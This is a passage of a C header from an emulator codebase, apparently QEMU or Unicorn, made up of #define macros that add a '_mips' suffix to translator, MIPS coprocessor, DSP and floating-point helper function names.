tb_invalidate_phys_range_mips #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mips #define tb_check_watchpoint tb_check_watchpoint_mips #define cpu_io_recompile cpu_io_recompile_mips #define tb_flush_jmp_cache tb_flush_jmp_cache_mips #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_mips #define translator_loop_temp_check translator_loop_temp_check_mips #define translator_loop translator_loop_mips #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_mips #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_mips #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_mips #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_mips #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_mips #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_mips #define unassigned_mem_ops unassigned_mem_ops_mips #define floatx80_infinity floatx80_infinity_mips #define dup_const_func dup_const_func_mips #define gen_helper_raise_exception gen_helper_raise_exception_mips #define gen_helper_raise_interrupt gen_helper_raise_interrupt_mips #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mips #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mips #define gen_helper_cpsr_read gen_helper_cpsr_read_mips #define gen_helper_cpsr_write gen_helper_cpsr_write_mips #define 
tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_mips #define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mips #define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mips #define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mips #define helper_mfc0_random helper_mfc0_random_mips #define helper_mfc0_tcstatus helper_mfc0_tcstatus_mips #define helper_mftc0_tcstatus helper_mftc0_tcstatus_mips #define helper_mfc0_tcbind helper_mfc0_tcbind_mips #define helper_mftc0_tcbind helper_mftc0_tcbind_mips #define helper_mfc0_tcrestart helper_mfc0_tcrestart_mips #define helper_mftc0_tcrestart helper_mftc0_tcrestart_mips #define helper_mfc0_tchalt helper_mfc0_tchalt_mips #define helper_mftc0_tchalt helper_mftc0_tchalt_mips #define helper_mfc0_tccontext helper_mfc0_tccontext_mips #define helper_mftc0_tccontext helper_mftc0_tccontext_mips #define helper_mfc0_tcschedule helper_mfc0_tcschedule_mips #define helper_mftc0_tcschedule helper_mftc0_tcschedule_mips #define helper_mfc0_tcschefback helper_mfc0_tcschefback_mips #define helper_mftc0_tcschefback helper_mftc0_tcschefback_mips #define helper_mfc0_count helper_mfc0_count_mips #define helper_mfc0_saar helper_mfc0_saar_mips #define helper_mfhc0_saar helper_mfhc0_saar_mips #define helper_mftc0_entryhi helper_mftc0_entryhi_mips #define helper_mftc0_cause helper_mftc0_cause_mips #define helper_mftc0_status helper_mftc0_status_mips #define helper_mfc0_lladdr helper_mfc0_lladdr_mips #define helper_mfc0_maar helper_mfc0_maar_mips #define helper_mfhc0_maar helper_mfhc0_maar_mips #define helper_mfc0_watchlo helper_mfc0_watchlo_mips #define helper_mfc0_watchhi helper_mfc0_watchhi_mips #define helper_mfhc0_watchhi helper_mfhc0_watchhi_mips #define helper_mfc0_debug helper_mfc0_debug_mips #define helper_mftc0_debug helper_mftc0_debug_mips #define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mips #define helper_dmfc0_tchalt helper_dmfc0_tchalt_mips #define helper_dmfc0_tccontext helper_dmfc0_tccontext_mips #define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mips #define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mips #define helper_dmfc0_lladdr helper_dmfc0_lladdr_mips #define helper_dmfc0_maar helper_dmfc0_maar_mips #define helper_dmfc0_watchlo helper_dmfc0_watchlo_mips #define helper_dmfc0_watchhi helper_dmfc0_watchhi_mips #define helper_dmfc0_saar helper_dmfc0_saar_mips #define helper_mtc0_index helper_mtc0_index_mips #define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mips #define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mips #define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mips #define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mips #define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mips #define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mips #define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mips #define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mips #define helper_mtc0_yqmask helper_mtc0_yqmask_mips #define helper_mtc0_vpeopt helper_mtc0_vpeopt_mips #define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mips #define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mips #define helper_mtc0_tcstatus helper_mtc0_tcstatus_mips #define helper_mttc0_tcstatus helper_mttc0_tcstatus_mips #define helper_mtc0_tcbind helper_mtc0_tcbind_mips #define helper_mttc0_tcbind helper_mttc0_tcbind_mips #define helper_mtc0_tcrestart helper_mtc0_tcrestart_mips #define helper_mttc0_tcrestart helper_mttc0_tcrestart_mips #define helper_mtc0_tchalt helper_mtc0_tchalt_mips #define helper_mttc0_tchalt helper_mttc0_tchalt_mips #define helper_mtc0_tccontext 
helper_mtc0_tccontext_mips #define helper_mttc0_tccontext helper_mttc0_tccontext_mips #define helper_mtc0_tcschedule helper_mtc0_tcschedule_mips #define helper_mttc0_tcschedule helper_mttc0_tcschedule_mips #define helper_mtc0_tcschefback helper_mtc0_tcschefback_mips #define helper_mttc0_tcschefback helper_mttc0_tcschefback_mips #define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mips #define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mips #define helper_mtc0_context helper_mtc0_context_mips #define helper_mtc0_memorymapid helper_mtc0_memorymapid_mips #define update_pagemask update_pagemask_mips #define helper_mtc0_pagemask helper_mtc0_pagemask_mips #define helper_mtc0_pagegrain helper_mtc0_pagegrain_mips #define helper_mtc0_segctl0 helper_mtc0_segctl0_mips #define helper_mtc0_segctl1 helper_mtc0_segctl1_mips #define helper_mtc0_segctl2 helper_mtc0_segctl2_mips #define helper_mtc0_pwfield helper_mtc0_pwfield_mips #define helper_mtc0_pwsize helper_mtc0_pwsize_mips #define helper_mtc0_wired helper_mtc0_wired_mips #define helper_mtc0_pwctl helper_mtc0_pwctl_mips #define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mips #define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mips #define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mips #define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mips #define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mips #define helper_mtc0_hwrena helper_mtc0_hwrena_mips #define helper_mtc0_count helper_mtc0_count_mips #define helper_mtc0_saari helper_mtc0_saari_mips #define helper_mtc0_saar helper_mtc0_saar_mips #define helper_mthc0_saar helper_mthc0_saar_mips #define helper_mtc0_entryhi helper_mtc0_entryhi_mips #define helper_mttc0_entryhi helper_mttc0_entryhi_mips #define helper_mtc0_compare helper_mtc0_compare_mips #define helper_mtc0_status helper_mtc0_status_mips #define helper_mttc0_status helper_mttc0_status_mips #define helper_mtc0_intctl helper_mtc0_intctl_mips #define helper_mtc0_srsctl helper_mtc0_srsctl_mips #define helper_mtc0_cause helper_mtc0_cause_mips #define helper_mttc0_cause helper_mttc0_cause_mips #define helper_mftc0_epc helper_mftc0_epc_mips #define helper_mftc0_ebase helper_mftc0_ebase_mips #define helper_mtc0_ebase helper_mtc0_ebase_mips #define helper_mttc0_ebase helper_mttc0_ebase_mips #define helper_mftc0_configx helper_mftc0_configx_mips #define helper_mtc0_config0 helper_mtc0_config0_mips #define helper_mtc0_config2 helper_mtc0_config2_mips #define helper_mtc0_config3 helper_mtc0_config3_mips #define helper_mtc0_config4 helper_mtc0_config4_mips #define helper_mtc0_config5 helper_mtc0_config5_mips #define helper_mtc0_lladdr helper_mtc0_lladdr_mips #define helper_mtc0_maar helper_mtc0_maar_mips #define helper_mthc0_maar helper_mthc0_maar_mips #define helper_mtc0_maari helper_mtc0_maari_mips #define helper_mtc0_watchlo helper_mtc0_watchlo_mips #define helper_mtc0_watchhi helper_mtc0_watchhi_mips #define helper_mthc0_watchhi helper_mthc0_watchhi_mips #define helper_mtc0_xcontext helper_mtc0_xcontext_mips #define helper_mtc0_framemask helper_mtc0_framemask_mips #define helper_mtc0_debug helper_mtc0_debug_mips #define helper_mttc0_debug helper_mttc0_debug_mips #define helper_mtc0_performance0 helper_mtc0_performance0_mips #define helper_mtc0_errctl helper_mtc0_errctl_mips #define helper_mtc0_taglo helper_mtc0_taglo_mips #define helper_mtc0_datalo helper_mtc0_datalo_mips #define helper_mtc0_taghi helper_mtc0_taghi_mips #define helper_mtc0_datahi helper_mtc0_datahi_mips #define helper_mftgpr helper_mftgpr_mips #define helper_mftlo helper_mftlo_mips #define 
helper_mfthi helper_mfthi_mips #define helper_mftacx helper_mftacx_mips #define helper_mftdsp helper_mftdsp_mips #define helper_mttgpr helper_mttgpr_mips #define helper_mttlo helper_mttlo_mips #define helper_mtthi helper_mtthi_mips #define helper_mttacx helper_mttacx_mips #define helper_mttdsp helper_mttdsp_mips #define helper_dmt helper_dmt_mips #define helper_emt helper_emt_mips #define helper_dvpe helper_dvpe_mips #define helper_evpe helper_evpe_mips #define helper_dvp helper_dvp_mips #define helper_evp helper_evp_mips #define cpu_mips_get_random cpu_mips_get_random_mips #define cpu_mips_init cpu_mips_init_mips #define helper_absq_s_ph helper_absq_s_ph_mips #define helper_absq_s_qb helper_absq_s_qb_mips #define helper_absq_s_w helper_absq_s_w_mips #define helper_absq_s_ob helper_absq_s_ob_mips #define helper_absq_s_qh helper_absq_s_qh_mips #define helper_absq_s_pw helper_absq_s_pw_mips #define helper_addqh_ph helper_addqh_ph_mips #define helper_addqh_r_ph helper_addqh_r_ph_mips #define helper_addqh_r_w helper_addqh_r_w_mips #define helper_addqh_w helper_addqh_w_mips #define helper_adduh_qb helper_adduh_qb_mips #define helper_adduh_r_qb helper_adduh_r_qb_mips #define helper_subqh_ph helper_subqh_ph_mips #define helper_subqh_r_ph helper_subqh_r_ph_mips #define helper_subqh_r_w helper_subqh_r_w_mips #define helper_subqh_w helper_subqh_w_mips #define helper_addq_ph helper_addq_ph_mips #define helper_addq_s_ph helper_addq_s_ph_mips #define helper_addq_s_w helper_addq_s_w_mips #define helper_addu_ph helper_addu_ph_mips #define helper_addu_qb helper_addu_qb_mips #define helper_addu_s_ph helper_addu_s_ph_mips #define helper_addu_s_qb helper_addu_s_qb_mips #define helper_subq_ph helper_subq_ph_mips #define helper_subq_s_ph helper_subq_s_ph_mips #define helper_subq_s_w helper_subq_s_w_mips #define helper_subu_ph helper_subu_ph_mips #define helper_subu_qb helper_subu_qb_mips #define helper_subu_s_ph helper_subu_s_ph_mips #define helper_subu_s_qb helper_subu_s_qb_mips #define helper_adduh_ob helper_adduh_ob_mips #define helper_adduh_r_ob helper_adduh_r_ob_mips #define helper_subuh_ob helper_subuh_ob_mips #define helper_subuh_r_ob helper_subuh_r_ob_mips #define helper_addq_pw helper_addq_pw_mips #define helper_addq_qh helper_addq_qh_mips #define helper_addq_s_pw helper_addq_s_pw_mips #define helper_addq_s_qh helper_addq_s_qh_mips #define helper_addu_ob helper_addu_ob_mips #define helper_addu_qh helper_addu_qh_mips #define helper_addu_s_ob helper_addu_s_ob_mips #define helper_addu_s_qh helper_addu_s_qh_mips #define helper_subq_pw helper_subq_pw_mips #define helper_subq_qh helper_subq_qh_mips #define helper_subq_s_pw helper_subq_s_pw_mips #define helper_subq_s_qh helper_subq_s_qh_mips #define helper_subu_ob helper_subu_ob_mips #define helper_subu_qh helper_subu_qh_mips #define helper_subu_s_ob helper_subu_s_ob_mips #define helper_subu_s_qh helper_subu_s_qh_mips #define helper_subuh_qb helper_subuh_qb_mips #define helper_subuh_r_qb helper_subuh_r_qb_mips #define helper_addsc helper_addsc_mips #define helper_addwc helper_addwc_mips #define helper_modsub helper_modsub_mips #define helper_raddu_w_qb helper_raddu_w_qb_mips #define helper_raddu_l_ob helper_raddu_l_ob_mips #define helper_precr_qb_ph helper_precr_qb_ph_mips #define helper_precrq_qb_ph helper_precrq_qb_ph_mips #define helper_precr_sra_ph_w helper_precr_sra_ph_w_mips #define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mips #define helper_precrq_ph_w helper_precrq_ph_w_mips #define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mips #define 
helper_precr_ob_qh helper_precr_ob_qh_mips #define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mips #define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mips #define helper_precrq_ob_qh helper_precrq_ob_qh_mips #define helper_precrq_qh_pw helper_precrq_qh_pw_mips #define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mips #define helper_precrq_pw_l helper_precrq_pw_l_mips #define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mips #define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mips #define helper_preceq_pw_qhl helper_preceq_pw_qhl_mips #define helper_preceq_pw_qhr helper_preceq_pw_qhr_mips #define helper_preceq_pw_qhla helper_preceq_pw_qhla_mips #define helper_preceq_pw_qhra helper_preceq_pw_qhra_mips #define helper_precequ_ph_qbl helper_precequ_ph_qbl_mips #define helper_precequ_ph_qbr helper_precequ_ph_qbr_mips #define helper_precequ_ph_qbla helper_precequ_ph_qbla_mips #define helper_precequ_ph_qbra helper_precequ_ph_qbra_mips #define helper_precequ_qh_obl helper_precequ_qh_obl_mips #define helper_precequ_qh_obr helper_precequ_qh_obr_mips #define helper_precequ_qh_obla helper_precequ_qh_obla_mips #define helper_precequ_qh_obra helper_precequ_qh_obra_mips #define helper_preceu_ph_qbl helper_preceu_ph_qbl_mips #define helper_preceu_ph_qbr helper_preceu_ph_qbr_mips #define helper_preceu_ph_qbla helper_preceu_ph_qbla_mips #define helper_preceu_ph_qbra helper_preceu_ph_qbra_mips #define helper_preceu_qh_obl helper_preceu_qh_obl_mips #define helper_preceu_qh_obr helper_preceu_qh_obr_mips #define helper_preceu_qh_obla helper_preceu_qh_obla_mips #define helper_preceu_qh_obra helper_preceu_qh_obra_mips #define helper_shll_qb helper_shll_qb_mips #define helper_shrl_qb helper_shrl_qb_mips #define helper_shra_qb helper_shra_qb_mips #define helper_shra_r_qb helper_shra_r_qb_mips #define helper_shll_ob helper_shll_ob_mips #define helper_shrl_ob helper_shrl_ob_mips #define helper_shra_ob helper_shra_ob_mips #define helper_shra_r_ob helper_shra_r_ob_mips #define helper_shll_ph helper_shll_ph_mips #define helper_shll_s_ph helper_shll_s_ph_mips #define helper_shll_qh helper_shll_qh_mips #define helper_shll_s_qh helper_shll_s_qh_mips #define helper_shrl_qh helper_shrl_qh_mips #define helper_shra_qh helper_shra_qh_mips #define helper_shra_r_qh helper_shra_r_qh_mips #define helper_shll_s_w helper_shll_s_w_mips #define helper_shra_r_w helper_shra_r_w_mips #define helper_shll_pw helper_shll_pw_mips #define helper_shll_s_pw helper_shll_s_pw_mips #define helper_shra_pw helper_shra_pw_mips #define helper_shra_r_pw helper_shra_r_pw_mips #define helper_shrl_ph helper_shrl_ph_mips #define helper_shra_ph helper_shra_ph_mips #define helper_shra_r_ph helper_shra_r_ph_mips #define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mips #define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mips #define helper_mulq_rs_ph helper_mulq_rs_ph_mips #define helper_mul_ph helper_mul_ph_mips #define helper_mul_s_ph helper_mul_s_ph_mips #define helper_mulq_s_ph helper_mulq_s_ph_mips #define helper_muleq_s_w_phl helper_muleq_s_w_phl_mips #define helper_muleq_s_w_phr helper_muleq_s_w_phr_mips #define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mips #define helper_mulsa_w_ph helper_mulsa_w_ph_mips #define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mips #define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mips #define helper_mulq_rs_qh helper_mulq_rs_qh_mips #define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mips #define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mips #define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mips #define 
helper_dpau_h_qbl helper_dpau_h_qbl_mips #define helper_dpau_h_qbr helper_dpau_h_qbr_mips #define helper_dpsu_h_qbl helper_dpsu_h_qbl_mips #define helper_dpsu_h_qbr helper_dpsu_h_qbr_mips #define helper_dpau_h_obl helper_dpau_h_obl_mips #define helper_dpau_h_obr helper_dpau_h_obr_mips #define helper_dpsu_h_obl helper_dpsu_h_obl_mips #define helper_dpsu_h_obr helper_dpsu_h_obr_mips #define helper_dpa_w_ph helper_dpa_w_ph_mips #define helper_dpax_w_ph helper_dpax_w_ph_mips #define helper_dps_w_ph helper_dps_w_ph_mips #define helper_dpsx_w_ph helper_dpsx_w_ph_mips #define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mips #define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mips #define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mips #define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mips #define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mips #define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mips #define helper_dpa_w_qh helper_dpa_w_qh_mips #define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mips #define helper_dps_w_qh helper_dps_w_qh_mips #define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mips #define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mips #define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mips #define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mips #define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mips #define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mips #define helper_maq_s_w_phl helper_maq_s_w_phl_mips #define helper_maq_s_w_phr helper_maq_s_w_phr_mips #define helper_maq_sa_w_phl helper_maq_sa_w_phl_mips #define helper_maq_sa_w_phr helper_maq_sa_w_phr_mips #define helper_mulq_s_w helper_mulq_s_w_mips #define helper_mulq_rs_w helper_mulq_rs_w_mips #define helper_maq_s_w_qhll helper_maq_s_w_qhll_mips #define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mips #define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mips #define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mips #define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mips #define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mips #define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mips #define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mips #define helper_maq_s_l_pwl helper_maq_s_l_pwl_mips #define helper_maq_s_l_pwr helper_maq_s_l_pwr_mips #define helper_dmadd helper_dmadd_mips #define helper_dmaddu helper_dmaddu_mips #define helper_dmsub helper_dmsub_mips #define helper_dmsubu helper_dmsubu_mips #define helper_bitrev helper_bitrev_mips #define helper_insv helper_insv_mips #define helper_dinsv helper_dinsv_mips #define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mips #define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mips #define helper_cmpgu_le_qb helper_cmpgu_le_qb_mips #define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mips #define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mips #define helper_cmpgu_le_ob helper_cmpgu_le_ob_mips #define helper_cmpu_eq_qb helper_cmpu_eq_qb_mips #define helper_cmpu_lt_qb helper_cmpu_lt_qb_mips #define helper_cmpu_le_qb helper_cmpu_le_qb_mips #define helper_cmp_eq_ph helper_cmp_eq_ph_mips #define helper_cmp_lt_ph helper_cmp_lt_ph_mips #define helper_cmp_le_ph helper_cmp_le_ph_mips #define helper_cmpu_eq_ob helper_cmpu_eq_ob_mips #define helper_cmpu_lt_ob helper_cmpu_lt_ob_mips #define helper_cmpu_le_ob helper_cmpu_le_ob_mips #define helper_cmp_eq_qh helper_cmp_eq_qh_mips #define helper_cmp_lt_qh helper_cmp_lt_qh_mips #define helper_cmp_le_qh helper_cmp_le_qh_mips #define helper_cmp_eq_pw helper_cmp_eq_pw_mips #define helper_cmp_lt_pw helper_cmp_lt_pw_mips #define helper_cmp_le_pw helper_cmp_le_pw_mips #define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mips #define 
helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mips #define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mips #define helper_pick_qb helper_pick_qb_mips #define helper_pick_ph helper_pick_ph_mips #define helper_pick_ob helper_pick_ob_mips #define helper_pick_qh helper_pick_qh_mips #define helper_pick_pw helper_pick_pw_mips #define helper_packrl_ph helper_packrl_ph_mips #define helper_packrl_pw helper_packrl_pw_mips #define helper_extr_w helper_extr_w_mips #define helper_extr_r_w helper_extr_r_w_mips #define helper_extr_rs_w helper_extr_rs_w_mips #define helper_dextr_w helper_dextr_w_mips #define helper_dextr_r_w helper_dextr_r_w_mips #define helper_dextr_rs_w helper_dextr_rs_w_mips #define helper_dextr_l helper_dextr_l_mips #define helper_dextr_r_l helper_dextr_r_l_mips #define helper_dextr_rs_l helper_dextr_rs_l_mips #define helper_extr_s_h helper_extr_s_h_mips #define helper_dextr_s_h helper_dextr_s_h_mips #define helper_extp helper_extp_mips #define helper_extpdp helper_extpdp_mips #define helper_dextp helper_dextp_mips #define helper_dextpdp helper_dextpdp_mips #define helper_shilo helper_shilo_mips #define helper_dshilo helper_dshilo_mips #define helper_mthlip helper_mthlip_mips #define helper_dmthlip helper_dmthlip_mips #define cpu_wrdsp cpu_wrdsp_mips #define helper_wrdsp helper_wrdsp_mips #define cpu_rddsp cpu_rddsp_mips #define helper_rddsp helper_rddsp_mips #define helper_cfc1 helper_cfc1_mips #define helper_ctc1 helper_ctc1_mips #define ieee_ex_to_mips ieee_ex_to_mips_mips #define helper_float_sqrt_d helper_float_sqrt_d_mips #define helper_float_sqrt_s helper_float_sqrt_s_mips #define helper_float_cvtd_s helper_float_cvtd_s_mips #define helper_float_cvtd_w helper_float_cvtd_w_mips #define helper_float_cvtd_l helper_float_cvtd_l_mips #define helper_float_cvt_l_d helper_float_cvt_l_d_mips #define helper_float_cvt_l_s helper_float_cvt_l_s_mips #define helper_float_cvtps_pw helper_float_cvtps_pw_mips #define helper_float_cvtpw_ps helper_float_cvtpw_ps_mips #define helper_float_cvts_d helper_float_cvts_d_mips #define helper_float_cvts_w helper_float_cvts_w_mips #define helper_float_cvts_l helper_float_cvts_l_mips #define helper_float_cvts_pl helper_float_cvts_pl_mips #define helper_float_cvts_pu helper_float_cvts_pu_mips #define helper_float_cvt_w_s helper_float_cvt_w_s_mips #define helper_float_cvt_w_d helper_float_cvt_w_d_mips #define helper_float_round_l_d helper_float_round_l_d_mips #define helper_float_round_l_s helper_float_round_l_s_mips #define helper_float_round_w_d helper_float_round_w_d_mips #define helper_float_round_w_s helper_float_round_w_s_mips #define helper_float_trunc_l_d helper_float_trunc_l_d_mips #define helper_float_trunc_l_s helper_float_trunc_l_s_mips #define helper_float_trunc_w_d helper_float_trunc_w_d_mips #define helper_float_trunc_w_s helper_float_trunc_w_s_mips #define helper_float_ceil_l_d helper_float_ceil_l_d_mips #define helper_float_ceil_l_s helper_float_ceil_l_s_mips #define helper_float_ceil_w_d helper_float_ceil_w_d_mips #define helper_float_ceil_w_s helper_float_ceil_w_s_mips #define helper_float_floor_l_d helper_float_floor_l_d_mips #define helper_float_floor_l_s helper_float_floor_l_s_mips #define helper_float_floor_w_d helper_float_floor_w_d_mips #define helper_float_floor_w_s helper_float_floor_w_s_mips #define helper_float_cvt_2008_l_d helper_float_cvt_2008_l_d_mips #define helper_float_cvt_2008_l_s helper_float_cvt_2008_l_s_mips #define helper_float_cvt_2008_w_d helper_float_cvt_2008_w_d_mips #define helper_float_cvt_2008_w_s 
helper_float_cvt_2008_w_s_mips #define helper_float_round_2008_l_d helper_float_round_2008_l_d_mips #define helper_float_round_2008_l_s helper_float_round_2008_l_s_mips #define helper_float_round_2008_w_d helper_float_round_2008_w_d_mips #define helper_float_round_2008_w_s helper_float_round_2008_w_s_mips #define helper_float_trunc_2008_l_d helper_float_trunc_2008_l_d_mips #define helper_float_trunc_2008_l_s helper_float_trunc_2008_l_s_mips #define helper_float_trunc_2008_w_d helper_float_trunc_2008_w_d_mips #define helper_float_trunc_2008_w_s helper_float_trunc_2008_w_s_mips #define helper_float_ceil_2008_l_d helper_float_ceil_2008_l_d_mips #define helper_float_ceil_2008_l_s helper_float_ceil_2008_l_s_mips #define helper_float_ceil_2008_w_d helper_float_ceil_2008_w_d_mips #define helper_float_ceil_2008_w_s helper_float_ceil_2008_w_s_mips #define helper_float_floor_2008_l_d helper_float_floor_2008_l_d_mips #define helper_float_floor_2008_l_s helper_float_floor_2008_l_s_mips #define helper_float_floor_2008_w_d helper_float_floor_2008_w_d_mips #define helper_float_floor_2008_w_s helper_float_floor_2008_w_s_mips #define helper_float_abs_d helper_float_abs_d_mips #define helper_float_abs_s helper_float_abs_s_mips #define helper_float_abs_ps helper_float_abs_ps_mips #define helper_float_chs_d helper_float_chs_d_mips #define helper_float_chs_s helper_float_chs_s_mips #define helper_float_chs_ps helper_float_chs_ps_mips #define helper_float_recip_d helper_float_recip_d_mips #define helper_float_recip_s helper_float_recip_s_mips #define helper_float_rsqrt_d helper_float_rsqrt_d_mips #define helper_float_rsqrt_s helper_float_rsqrt_s_mips #define helper_float_recip1_d helper_float_recip1_d_mips #define helper_float_recip1_s helper_float_recip1_s_mips #define helper_float_recip1_ps helper_float_recip1_ps_mips #define helper_float_rsqrt1_d helper_float_rsqrt1_d_mips #define helper_float_rsqrt1_s helper_float_rsqrt1_s_mips #define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mips #define helper_float_rint_s helper_float_rint_s_mips #define helper_float_rint_d helper_float_rint_d_mips #define float_class_s float_class_s_mips #define helper_float_class_s helper_float_class_s_mips #define float_class_d float_class_d_mips #define helper_float_class_d helper_float_class_d_mips #define helper_float_add_d helper_float_add_d_mips #define helper_float_add_s helper_float_add_s_mips #define helper_float_add_ps helper_float_add_ps_mips #define helper_float_sub_d helper_float_sub_d_mips #define helper_float_sub_s helper_float_sub_s_mips #define helper_float_sub_ps helper_float_sub_ps_mips #define helper_float_mul_d helper_float_mul_d_mips #define helper_float_mul_s helper_float_mul_s_mips #define helper_float_mul_ps helper_float_mul_ps_mips #define helper_float_div_d helper_float_div_d_mips #define helper_float_div_s helper_float_div_s_mips #define helper_float_div_ps helper_float_div_ps_mips #define helper_float_recip2_d helper_float_recip2_d_mips #define helper_float_recip2_s helper_float_recip2_s_mips #define helper_float_recip2_ps helper_float_recip2_ps_mips #define helper_float_rsqrt2_d helper_float_rsqrt2_d_mips #define helper_float_rsqrt2_s helper_float_rsqrt2_s_mips #define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mips #define helper_float_addr_ps helper_float_addr_ps_mips #define helper_float_mulr_ps helper_float_mulr_ps_mips #define helper_float_max_s helper_float_max_s_mips #define helper_float_max_d helper_float_max_d_mips #define helper_float_maxa_s helper_float_maxa_s_mips #define 
helper_float_maxa_d helper_float_maxa_d_mips #define helper_float_min_s helper_float_min_s_mips #define helper_float_min_d helper_float_min_d_mips #define helper_float_mina_s helper_float_mina_s_mips #define helper_float_mina_d helper_float_mina_d_mips #define helper_float_madd_d helper_float_madd_d_mips #define helper_float_madd_s helper_float_madd_s_mips #define helper_float_madd_ps helper_float_madd_ps_mips #define helper_float_msub_d helper_float_msub_d_mips #define helper_float_msub_s helper_float_msub_s_mips #define helper_float_msub_ps helper_float_msub_ps_mips #define helper_float_nmadd_d helper_float_nmadd_d_mips #define helper_float_nmadd_s helper_float_nmadd_s_mips #define helper_float_nmadd_ps helper_float_nmadd_ps_mips #define helper_float_nmsub_d helper_float_nmsub_d_mips #define helper_float_nmsub_s helper_float_nmsub_s_mips #define helper_float_nmsub_ps helper_float_nmsub_ps_mips #define helper_float_maddf_s helper_float_maddf_s_mips #define helper_float_maddf_d helper_float_maddf_d_mips #define helper_float_msubf_s helper_float_msubf_s_mips #define helper_float_msubf_d helper_float_msubf_d_mips #define helper_cmp_d_f helper_cmp_d_f_mips #define helper_cmpabs_d_f helper_cmpabs_d_f_mips #define helper_cmp_d_un helper_cmp_d_un_mips #define helper_cmpabs_d_un helper_cmpabs_d_un_mips #define helper_cmp_d_eq helper_cmp_d_eq_mips #define helper_cmpabs_d_eq helper_cmpabs_d_eq_mips #define helper_cmp_d_ueq helper_cmp_d_ueq_mips #define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mips #define helper_cmp_d_olt helper_cmp_d_olt_mips #define helper_cmpabs_d_olt helper_cmpabs_d_olt_mips #define helper_cmp_d_ult helper_cmp_d_ult_mips #define helper_cmpabs_d_ult helper_cmpabs_d_ult_mips #define helper_cmp_d_ole helper_cmp_d_ole_mips #define helper_cmpabs_d_ole helper_cmpabs_d_ole_mips #define helper_cmp_d_ule helper_cmp_d_ule_mips #define helper_cmpabs_d_ule helper_cmpabs_d_ule_mips #define helper_cmp_d_sf helper_cmp_d_sf_mips #define helper_cmpabs_d_sf helper_cmpabs_d_sf_mips #define helper_cmp_d_ngle helper_cmp_d_ngle_mips #define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mips #define helper_cmp_d_seq helper_cmp_d_seq_mips #define helper_cmpabs_d_seq helper_cmpabs_d_seq_mips #define 